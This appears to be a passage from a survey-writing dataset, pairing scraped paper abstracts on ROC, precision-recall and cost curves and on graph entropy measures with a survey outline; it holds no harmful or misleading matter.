which has properties much like the convex hull in ROC space; we show an efficient algorithm for computing this curve. Finally, we also note differences in the two types of curves are significant for algorithm design. For example, in PR space it is incorrect to linearly interpolate between points. Furthermore, algorithms that optimize the area under the ROC curve are not guaranteed to optimize the area under the PR curve. --- paper_title: An Analysis of Rule Learning Heuristics paper_content: In this paper we analyze the most popular search heuristics for separate-andconquer rule learning algorithms. Our results show that all commonly used heuristics, including accuracy, weighted relative accuracy, entropy, Gini index and information gain, are equivalent to one of two fundamental prototypes: precision, which tries to optimize the area under the ROC curve for unknown costs, and a cost-eighted difference between covered positive and negative examples, which tries to find the optimal point under known or assumed costs. We also show that a straight-forward generalization of the m-heuristic is a means for trading off between these two prototypes. --- paper_title: Explicitly representing expected cost: an alternative to ROC representation paper_content: ABSTRACT This paper proposes an alternative to ROC representation, in which the expected cost of a classi er is represented explicitly. This expected cost representation maintains many of the advantages of ROC representation, but is easier to understand. It allows the experimenter to immediately see the range of costs and class frequencies where a particular classi er is the best and quantitatively how much better it is than other classi ers. This paper demonstrates there is a point/line duality between the two representations. A point in ROC space representing a classi er becomes a line segment spanning the full range of costs and class frequencies. This duality produces equivalent operations in the two spaces, allowing most techniques used in ROC analysis to be readily reproduced in the cost space. --- paper_title: Cost curves: An improved method for visualizing classifier performance paper_content: This paper introduces cost curves, a graphical technique for visualizing the performance (error rate or expected cost) of 2-class classifiers over the full range of possible class distributions and misclassification costs. Cost curves are shown to be superior to ROC curves for visualizing classifier performance for most purposes. This is because they visually support several crucial types of performance assessment that cannot be done easily with ROC curves, such as showing confidence intervals on a classifier's performance, and visualizing the statistical significance of the difference in performance of two classifiers. A software tool supporting all the cost curve analysis described in this paper is available from the authors. --- paper_title: What ROC curves can’t do (and cost curves can paper_content: This paper shows that ROC curves, as a method of visualizing classifier performance, are inadequate for the needs of Artificial Intelligence researchers in several significant respects, and demonstrates that a different way of visualizing performance – the cost curves introduced by Drummond and Holte at KDD’2000 – overcomes these deficiencies. --- paper_title: An improved measure for comparing diagnostic tests paper_content: We present a loss based method for comparing the predictive performance of diagnostic tests. Unlike standard assessment mechanisms, like the area under the receiver-operating characteristic curve and the misclassification rate, our method takes specific advantage of any information that can be obtained about misclassification costs. We argue that not taking costs into account can lead to incorrect conclusions, and illustrate with two examples. --- paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. ---
<format> Title: ROC Analysis of Classifiers in Machine Learning: A Survey Section 1: Introduction Description 1: Write an introduction to ROC analysis, its history, and its relevance in machine learning. Section 2: Definition of the ROC space Description 2: Define ROC space, explain the concept of confusion matrix, TPR, FPR, and the basic characteristics of ROC graphs. Section 3: Engaging classifiers into the ROC construction process Description 3: Detail the process of generating ROC curves for various classifiers and discuss specifics for common classification models. Section 4: Applications of ROC analysis Description 4: Describe the diverse applications of ROC analysis in machine learning, such as model evaluation, comparison, selection, presentation, and construction. Section 5: Improvements of the basic ROC technique Description 5: Discuss the enhancements and extensions to the basic ROC method, including ROC convex hulls, confidence intervals, multi-class extensions, and AUC metric variants. Section 6: Alternatives to the tools of ROC analysis Description 6: Provide an overview of alternative techniques to ROC graphs for classifier performance comparison, such as DET curves, LC plots, cost curves, and PR curves. Section 7: Conclusion Description 7: Summarize the key points discussed in the survey and mention the ongoing and future work in ROC analysis in machine learning. </format>
A survey of recent results in (generalized) graph entropies
13
--- paper_title: ENTROPY AND THE COMPLEXITY OF GRAPHS: II. THE INFORMATION CONTENT OF DIGRAPHS AND INFINITE GRAPHS paper_content: of the structural information content of an (undirected) graph X was defined, and its properties explored. The class of graphs on which Ig is defined is here enlarged to include directed graphs (digraphs). Most of the properties of I 0 observed in the undirected case are seen to hold for digraphs. The greater generality of digraphs allows for a construction which shows that there exists a digraph having information content equal to the entropy of an arbitrary partition of a given positive integer. The measure Ig is also extended to a measure defined on infinite (undirected) graphs. The properties of this extension are discussed, and its applicability to the problem of measuring the complexity of algorithms is considered. --- paper_title: A note on the information content of graphs paper_content: The role played by the group of a graph in determining sets of equivalent points is exposed and illustrated by a few simple examples. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: Entropy and the complexity of graphs: III. Graphs with prescribed information content paper_content: The connection between the adjacency matrix and the automorphisms of a digraph is used to develop a method for studying the automorphism group and, thus, the information content (Mowshowitz 1968a, b) of a digraph. An algorithm is given for constructing digraphs with zero information content, and the properties of such digraphs are examined. Moreover, an algorithm for computing the automorphism group of a digraph is presented and is used to find conditions which insure that two digraphs have the same information content. This algorithm is further used to determine the information content of digraphs whose adjacency matrices have prescribed properties. --- paper_title: Entropy and the complexity of graphs: IV. Entropy measures and graphical structure paper_content: The structural information contentI g (X) of a graphX was treated in detail in three previous papers (Mowshowitz 1968a, 1968b, 1968c). Those investigations ofI g point up the desirability of defining and examining other entropy-like measures on graphs. To this end the chromatic information contentI c (X) of a graphX is defined as the minimum entropy over all finite probability schemes constructed from chromatic decompositions having rank equal to the chromatic number ofX. Graph-theoretic results concerning chromatic number are used to establish basic properties ofI c on arbitrary graphs. Moreover, the behavior ofI c on certain special classes of graphs is examined. The peculiar structural characteristics of a graph on which the respective behaviors of the entropy-like measuresI c andI g depend are also discussed. --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Entropy and the complexity of graphs. I. An index of the relative complexity of a graph. paper_content: The structural information content (Rashevsky, 1955; Trucco 1956a, b)I g (X) of a graphX is defined as the entropy of the finite probability scheme constructed from the orbits of its automorphism groupG(X). The behavior ofI g on various graph operations—complement, sum, join, cartesian product and composition, is examined. The principal result of the paper is the characterization of a class of graph product operations on whichI g is semi-additive. That is to say, conditions are found for binary operations o and ∇ defined on graphs and groups, respectively, which are sufficient to insure thatI g (X o Y)=I g (X)+I g (Y)−H XY , whereH XY is a certain conditional entropy defined relative to the orbits ofG(X o Y) andG(X) ∇G(Y). --- paper_title: Identities and Inequalities for Tree Entropy paper_content: The notion of tree entropy was introduced by the author as a normalized limit of the number of spanning trees in finite graphs, but is defined on random infinite rooted graphs. We give some new expressions for tree entropy; one uses Fuglede-Kadison determinants, while another uses effective resistance. We use the latter to prove that tree entropy respects stochastic domination. We also prove that tree entropy is non-negative in the unweighted case, a special case of which establishes Lueck's Determinant Conjecture for Cayley-graph Laplacians. We use techniques from the theory of operators affiliated to von Neumann algebras. --- paper_title: Generalized graph entropies paper_content: This article deals with generalized entropies for graphs. These entropies result from applying information measures to a graph using various schemes for defining probability distributions over the elements (e.g., vertices) of the graph. We introduce a new class of generalized measures, develop their properties, compute the measures for selected graphs, and briefly discuss potential applications to classification and clustering problems. © 2011 Wiley Periodicals, Inc. Complexity, 17,45–50, 2011 © 2011 Wiley Periodicals, Inc. --- paper_title: A note on the information content of graphs paper_content: The role played by the group of a graph in determining sets of equivalent points is exposed and illustrated by a few simple examples. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. --- paper_title: Asymptotic enumeration of spanning trees paper_content: We give new general formulas for the asymptotics of the number of spanning trees of a large graph. A special case answers a question of McKay (1983) for regular graphs. The general answer involves a quantity for infinite graphs that we call "tree entropy", which we show is a logarithm of a normalized determinant of the graph Laplacian for infinite graphs. Tree entropy is also expressed using random walks. We relate tree entropy to the metric entropy of the uniform spanning forest process on quasi-transitive amenable graphs, extending a result of Burton and Pemantle (1993). --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Novel topological descriptors for analyzing biological networks paper_content: Background ::: Topological descriptors, other graph measures, and in a broader sense, graph-theoretical methods, have been proven as powerful tools to perform biological network analysis. However, the majority of the developed descriptors and graph-theoretical methods does not have the ability to take vertex- and edge-labels into account, e.g., atom- and bond-types when considering molecular graphs. Indeed, this feature is important to characterize biological networks more meaningfully instead of only considering pure topological information. --- paper_title: Inequalities for entropy-based measures of network information content paper_content: This paper presents a method for establishing relations between entropy-based measures applied to graphs. A special class of relations called implicit information inequalities or implicit entropy bounds is developed. A number of entropy-based measures of the structural information content of a graph have been developed over the past several decades, but little attention has been paid to relations among these measures. The research reported here aims to remedy this deficiency. --- paper_title: A history of graph entropy measures paper_content: This survey seeks to describe methods for measuring the entropy of graphs and to demonstrate the wide applicability of entropy measures. Setting the scene with a review of classical measures for determining the structural information content of graphs, we discuss graph entropy measures which play an important role in a variety of problem areas, including biology, chemistry, and sociology. In addition, we examine relationships between selected entropy measures, illustrating differences quantitatively with concrete examples. --- paper_title: Connections between Classical and Parametric Network Entropies paper_content: This paper explores relationships between classical and parametric measures of graph (or network) complexity. Classical measures are based on vertex decompositions induced by equivalence relations. Parametric measures, on the other hand, are constructed by using information functions to assign probabilities to the vertices. The inequalities established in this paper relating classical and parametric measures lay a foundation for systematic classification of entropy-based measures of graph complexity. --- paper_title: Connections between Classical and Parametric Network Entropies paper_content: This paper explores relationships between classical and parametric measures of graph (or network) complexity. Classical measures are based on vertex decompositions induced by equivalence relations. Parametric measures, on the other hand, are constructed by using information functions to assign probabilities to the vertices. The inequalities established in this paper relating classical and parametric measures lay a foundation for systematic classification of entropy-based measures of graph complexity. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph will be is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming to an understanding of information processing in complex networks. --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. --- paper_title: Mathematical concepts in organic chemistry paper_content: A Chemistry and Topology.- 1 Topological Aspects in Chemistry.- 1.1 Topology in Chemistry.- 1.2 Abstraction in Science and How Far One Can Go.- 2 Molecular Topology.- 2.1 What is Molecular Topology?.- 2.2 Geometry, Symmetry, Topology.- 2.3 Definition of Molecular Topology.- B Chemistry and Graph Theory.- 3 Chemical Graphs.- 4 Fundamentals of Graph Theory.- 4.1 The Definition of a Graph.- 4.1.1 Relations.- 4.1.2 The First Definition of a Graph.- 4.1.3 The Second Definition of a Graph.- 4.1.4 Vertices and Edges.- 4.1.5 Isomorphic Graphs and Graph Automorphisms.- 4.1.6 Special Graphs.- 4.2 Subgraphs.- 4.2.1 Sachs Graphs.- 4.2.2 Matchings.- 4.3 Graph Spectral Theory.- 4.3.1 The Adjacency Matrix.- 4.3.2 The Spectrum of a Graph.- 4.3.3 The Sachs Theorem.- 4.3.4 The ?-Polynomial.- 4.4 Graph Operations.- 5 Graph Theory and Molecular Orbitals.- 6 Special Molecular Graphs.- 6.1 Acyclic Molecules.- 6.1.1 Trees.- 6.1.2 The Path and the Star.- 6.1.3 The Characteristic Polynomial of Trees.- 6.1.4 Trees with Greatest Number of Matchings.- 6.1.5 The Spectrum of the Path.- 6.2 The Cycle.- 6.3 Alternant Molecules.- 6.3.1 Bipartite Graphs.- 6.3.2 The Pairing Theorem.- 6.3.3 Some Consequences of the Pairing Theorem.- 6.4 Benzenoid Molecules.- 6.4.1 Benzenoid Graphs.- 6.4.2 The Characteristic Polynomial of Benzenoid Graphs.- 6.5 Hydrocarbons and Molecules with Heteroatoms.- 6.5.1 On the Question of the Molecular Graph.- 6.5.2 The Characteristic Polynomial of Weighted Graphs.- 6.5.3 Some Regularities in the Electronic Structure of Heteroconjugated Molecules.- C Chemistry and Group Theory.- 7 Fundamentals of Group Theory.- 7.1 The Symmetry Group of an Equilateral Triangle.- 7.2 Order, Classes and Representations of a Group.- 7.3 Reducible and Irreducible Representations.- 7.4 Characters and Reduction of a Reducible Representation.- 7.5 Subgroups and Sidegroups - Products of Groups.- 7.6 Abelian Groups.- 7.7 Abstract Groups and Group Isomorphism.- 8 Symmetry Groups.- 8.1 Notation of Symmetry Elements and Representations.- 8.2 Some Symmetry Groups.- 8.2.1 Rotation Groups.- 8.2.2 Groups with More than One n-Fold Axis, n > 2.- 8.2.3 Groups of Collinear Molecules.- 8.3 Transformation Properties and Direct Products of Irreducible Representations.- 8.3.1 Transformation Properties.- 8.3.2 Rules Concerning the Direct Product of Irreducible Representations.- 8.4 Some Applications of Symmetry Groups.- 8.4.1 Electric Dipole Moment.- 8.4.2 Polarizability.- 8.4.3 Motions of Atomic Nuclei: Translations, Rotations and Vibrations.- 8.4.4 Transition Probabilities for the Absorption of Light.- 8.4.5 Transition Probabilities in Raman Spectra.- 8.4.6 Group Theory and Quantum Chemistry.- 8.4.7 Orbital and State Correlations.- 9 Automorphism Groups.- 9.1 Automorphism of a Graph.- 9.2 The Automorphism Group A(G1).- 9.3 Cycle Structure of Permutations.- 9.4 Isomorphism of Graphs and of Automorphism Groups 112..- 9.5 Notation of some Permutation Groups.- 9.6 Direct Product and Wreath Product.- 9.7 The Representation of Automorphism Groups as Group Products.- 10 Some Interrelations between Symmetry and Automorphism Groups.- 10.1 The Idea of Rigid Molecules.- 10.2 Local Symmetries.- 10.3 Non-Rigid Molecules.- 10.4 What Determines the Respective Orders of the Symmetry and the Automorphism Group of a Given Molecule?.- D Special Topics.- 11 Topological Indices.- 11.1 Indices Based on the Distance Matrix.- 11.1.1 The Wiener Number and Related Quantities.- 11.1.2 Applications of the Wiener Number.- 11.2 Hosoya's Topological Index.- 11.2.1 Definition and Chemical Applications of Hosoya's Index.- 11.2.2 Mathematical Properties of Hosoya's Index.- 11.2.3 Example: Hosoya's Index of the Path and the Cycle.- 11.2.4 Some Inequalities for Hosoya's Index.- 12 Thermodynamic Stability of Conjugated Molecules.- 12.1 Total ?-Electron Energy and Thermodynamic Stability of Conjugated Molecules.- 12.2 Total ?-Electron Energy and Molecular Topology.- 12.3 The Energy of a Graph.- 12.4 The Coulson Integral Formula.- 12.5 Some Further Applications of the Coulson Integral Formula.- 12.6 Bounds for Total ?-Electron Energy.- 12.7 More on the McClelland Formula.- 12.8 Conclusion: Factors Determining the Total ?-Electron Energy.- 12.9 Use of Total ?-Electron Energy in Chemistry.- 13 Topological Effect on Molecular Orbitals.- 13.1 Topologically Related Isomers.- 13.2 Interlacing Rule.- 13.3 PE Spectra of Topomers.- 13.4 TEMO and a-Electron Systems.- 13.5 TEMO and Symmetry.- Appendices.- Appendix 1 Matrices.- Appendix 2 Determinants.- Appendix 3 Eigenvalues and Eigenvectors.- Appendix 4 Polynomials.- Appendix 5 Characters of Irreducible Representations of Symmetry Groups.- Appendix 6 The Symbols Used.- Literature.- References. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Entropy Bounds for Hierarchical Molecular Networks paper_content: In this paper we derive entropy bounds for hierarchical networks. More precisely, starting from a recently introduced measure to determine the topological entropy of non-hierarchical networks, we provide bounds for estimating the entropy of hierarchical graphs. Apart from bounds to estimate the entropy of a single hierarchical graph, we see that the derived bounds can also be used for characterizing graph classes. Our contribution is an important extension to previous results about the entropy of non-hierarchical networks because for practical applications hierarchical networks are playing an important role in chemistry and biology. In addition to the derivation of the entropy bounds, we provide a numerical analysis for two special graph classes, rooted trees and generalized trees, and demonstrate hereby not only the computational feasibility of our method but also learn about its characteristics and interpretability with respect to data analysis. --- paper_title: Information theoretic measures of UHG graphs with low computational complexity paper_content: We introduce a novel graph class we call universal hierarchical graphs (UHG) whose topology can be found numerously in problems representing, e.g., temporal, spacial or general process structures of systems. For this graph class we show, that we can naturally assign two probability distributions, for nodes and for edges, which lead us directly to the definition of the entropy and joint entropy and, hence, mutual information establishing an information theory for this graph class. Furthermore, we provide some results under which conditions these constraint probability distributions maximize the corresponding entropy. Also, we demonstrate that these entropic measures can be computed efficiently which is a prerequisite for every large scale practical application and show some numerical examples. --- paper_title: Information processing in complex networks: Graph entropy and information functionals paper_content: This paper introduces a general framework for defining the entropy of a graph. Our definition is based on a local information graph and on information functionals derived from the topological structure of a given graph. More precisely, an information functional quantifies structural information of a graph based on a derived probability distribution. Such a probability distribution leads directly to an entropy of a graph. Then, the structural information content of a graph will be is interpreted and defined as the derived graph entropy. Another major contribution of this paper is the investigation of relationships between graph entropies. In addition to this, we provide numerical results demonstrating not only the feasibility of our method, which has polynomial time complexity, but also its usefulness with regard to practical applications aiming to an understanding of information processing in complex networks. --- paper_title: Recent Developments in Quantitative Graph Theory: Information Inequalities for Networks paper_content: In this article, we tackle a challenging problem in quantitative graph theory. We establish relations between graph entropy measures representing the structural information content of networks. In particular, we prove formal relations between quantitative network measures based on Shannon's entropy to study the relatedness of those measures. In order to establish such information inequalities for graphs, we focus on graph entropy measures based on information functionals. To prove such relations, we use known graph classes whose instances have been proven useful in various scientific areas. Our results extend the foregoing work on information inequalities for graphs. --- paper_title: Degree Powers in Graphs with Forbidden Subgraphs paper_content: Yuster and Caro initiated the study of the sum of powers of the degrees of graphs with forbidden subgraphs. We settle two of their conjectures. --- paper_title: Entropy bounds for dendrimers paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon’s entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and express some conjectures generated by numerical simulations to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which has most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verifies our results. --- paper_title: Chemical graph theory paper_content: Abstract The concept of Ulam sub-graphs is discussed and it is shown that such sub-graphs may be used without difficulty for establishing the characteristic polynomials of general (vertex- and edge-weighted) graphs. The use of Ulam sub-graphs in obtaining characteristic polynomials is compared with the construction of such polynomials via the Heilbronner formula, and it is found that the latter approach is simpler, when it is applicable. --- paper_title: Triangles in a complete chromatic graph paper_content: Suppose that in a complete graph on N points, each edge is given arbitrarily either the color red or the color blue, but the total number of blue edges is fixed at T . We find the minimum number of monochromatic triangles in the graph as a function of N and T . The maximum number of monochromatic triangles presents a more difficult problem. Here we propose a reasonable conjecture supported by examples. --- paper_title: On Sets of Acquaintances and Strangers at any Party paper_content: It is our purpose to prove a more general result when the number 6 is replaced by any positive integer N (see Theorem 1 below). It is convenient to transform the problem into an equivalent problem concerning points and lines. The N persons involved are replaced by points Ak, k =1, * *, N, no three of which are collinear and if two persons are acquainted a line is drawn joining the corresponding pair of points. If the two persons are strangers then no line is drawn. Thus each collection of N people gives rise to a corresponding configuration of N points and L lines where 0? L < N(N1)/2. If three people are mutually acquainted the corresponding figure is a triangle which we will call a full triangle. If three people are pairwise strangers the corresponding figure consists of three points with no lines joining any pair. We call such a figure an empty triangle. Any set of three points not the vertices of a full triangle, nor an empty triangle, will be called a partial triangle. Notice that a given point may simultaneously be a vertex of several triangles from each category. With these definitions we have --- paper_title: Extremality of degree-based graph entropies paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. Based on Shannon’s entropy, we study graph entropies which are based on vertex degrees by using so-called information functionals. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. The main contribution of this paper is to prove some extremal values for the underlying graph entropy of certain families of graphs and to find the connection between the graph entropy and the sum of degree powers. Further, conjectures to determine extremal values of graph entropies are given. --- paper_title: A Note on Distance-based Graph Entropies paper_content: A variety of problems in, e.g., discrete mathematics, computer science, information theory, statistics, chemistry, biology, etc., deal with inferring and characterizing relational structures by using graph measures. In this sense, it has been proven that information-theoretic quantities representing graph entropies possess useful properties such as a meaningful structural interpretation and uniqueness. As classical work, many distance-based graph entropies, e.g., the ones due to Bonchev et al. and related quantities have been proposed and studied. Our contribution is to explore graph entropies that are based on a novel information functional, which is the number of vertices with distance \(k\) to a given vertex. In particular, we investigate some properties thereof leading to a better understanding of this new information-theoretic quantity. --- paper_title: Degree-based entropies of networks revisited paper_content: Studies on the information content of graphs and networks have been initiated in the late fifties based on the seminal work due to Shannon and Rashevsky. Various graph parameters have been used for the construction of entropy-based measures to characterize the structure of complex networks. Based on Shannon's entropy, in Cao et?al. (Extremality of degree-based graph entropies, Inform. Sci. 278 (2014) 22-33), we studied graph entropies which are based on vertex degrees by using so-called information functionals. As a matter of fact, there has been very little work to find their extremal values when considered Shannon entropy-based graph measures. We pursue with this line of research by proving further extremal properties of the degree-based graph entropies. --- paper_title: A Note on Distance-based Graph Entropies paper_content: A variety of problems in, e.g., discrete mathematics, computer science, information theory, statistics, chemistry, biology, etc., deal with inferring and characterizing relational structures by using graph measures. In this sense, it has been proven that information-theoretic quantities representing graph entropies possess useful properties such as a meaningful structural interpretation and uniqueness. As classical work, many distance-based graph entropies, e.g., the ones due to Bonchev et al. and related quantities have been proposed and studied. Our contribution is to explore graph entropies that are based on a novel information functional, which is the number of vertices with distance \(k\) to a given vertex. In particular, we investigate some properties thereof leading to a better understanding of this new information-theoretic quantity. --- paper_title: Entropy bounds for dendrimers paper_content: Abstract Many graph invariants have been used for the construction of entropy-based measures to characterize the structure of complex networks. When considering Shannon entropy-based graph measures, there has been very little work to find their extremal values. A reason for this might be the fact that Shannon’s entropy represents a multivariate function and all probability values are not equal to zero when considering graph entropies. Dehmer and Kraus proved some extremal results for graph entropies which are based on information functionals and express some conjectures generated by numerical simulations to find extremal values of graph entropies. Dehmer and Kraus discussed the extremal values of entropies for dendrimers. In this paper, we continue to study the extremal values of graph entropy for dendrimers, which has most interesting applications in molecular structure networks, and also in the pharmaceutical and biomedical area. Among all dendrimers with n vertices, we obtain the extremal values of graph entropy based on different well-known information functionals. Numerical experiments verifies our results. --- paper_title: INFORMATION-THEORETIC CONCEPTS FOR THE ANALYSIS OF COMPLEX NETWORKS paper_content: In this article, we present information-theoretic concepts for analyzing complex networks. We see that the application of information-theoretic concepts to networks leads to interesting tasks and gives a possibility for understanding information processing in networks. The main contribution of this article is a method for determining the structural information content of graphs that is based on a tree decomposition. It turns out that the computational complexity of the underlying algorithm is polynomial. Finally, we present some numerical results to study the influence of the used methods on the resulting information contents. --- paper_title: A Large Scale Analysis of Information-Theoretic Network Complexity Measures Using Chemical Structures paper_content: This paper aims to investigate information-theoretic network complexity measures which have already been intensely used in mathematical- and medicinal chemistry including drug design. Numerous such measures have been developed so far but many of them lack a meaningful interpretation, e.g., we want to examine which kind of structural information they detect. Therefore, our main contribution is to shed light on the relatedness between some selected information measures for graphs by performing a large scale analysis using chemical networks. Starting from several sets containing real and synthetic chemical structures represented by graphs, we study the relatedness between a classical (partition-based) complexity measure called the topological information content of a graph and some others inferred by a different paradigm leading to partition-independent measures. Moreover, we evaluate the uniqueness of network complexity measures numerically. Generally, a high uniqueness is an important and desirable property when designing novel topological descriptors having the potential to be applied to large chemical databases. --- paper_title: Life, information theory, and topology paper_content: The information content of an organism determines to a large extent its ability to perform the basic vital functions: selection of food, breaking up of the food molecules into appropriate parts, selection of those parts, and their assimilation. The information content needed is very large and requires a sufficiently large complexity of the organism. The information content of an organism is largely determined by the information content of the constituent organic molecules. The information content of the latter is in its turn determined by the number of physically distinguishable atoms or radicals of which the molecule is composed. The different arrangements of atoms in a molecule are represented by the structural formula, which is basically a graph. It is shown that the topology of this graph also determines to a large extent the information content. Different points of a graph may be physically indistinguishable; in general, however, they are different in regard to their topological properties. A study of the relations between the topological properties of graphs and their information content is suggested, and several theorems are demonstrated. A relation between topology and living processes is thus found also on the molecular level. --- paper_title: On Extremal Properties of Graph Entropies paper_content: We study extremal properties of graph entropies based on so-called information functionals. We obtain som ee xtre mality results for the resulting graph entropies which rely on the well-known Shannon entropy. Also by applying these results, we infer some entropy bounds for certain graph classes. Further, conjectures to determine extremal values (maximum and minimum values) of the graph entropies graphs based on numerical results are given. --- paper_title: INFORMATION-THEORETIC CONCEPTS FOR THE ANALYSIS OF COMPLEX NETWORKS paper_content: In this article, we present information-theoretic concepts for analyzing complex networks. We see that the application of information-theoretic concepts to networks leads to interesting tasks and gives a possibility for understanding information processing in networks. The main contribution of this article is a method for determining the structural information content of graphs that is based on a tree decomposition. It turns out that the computational complexity of the underlying algorithm is polynomial. Finally, we present some numerical results to study the influence of the used methods on the resulting information contents. --- paper_title: On Sphere-Regular Graphs and the Extremality of Information-Theoretic Network Measures paper_content: The entropy of a chemical graph can be interpreted as its structural information content. In this paper, we study extremality properties of graph entropies based on so-called information functionals. Based on dierent information functionals using metrical properties of graphs, we tackle the problem of determining classes of graphs which take maximal and minimal values. Also, we dene a novel class of graphs which maximizes the structural information content based on the functional using i-spheres. Under certain assumptions, this class fully determines the class of maximal graphs based on their structural information content. For minimal graphs and other functionals, an analytic approach to the question failed. Hence we performed simulations and provide several conjectures on classes of extremal graphs by using our numerical 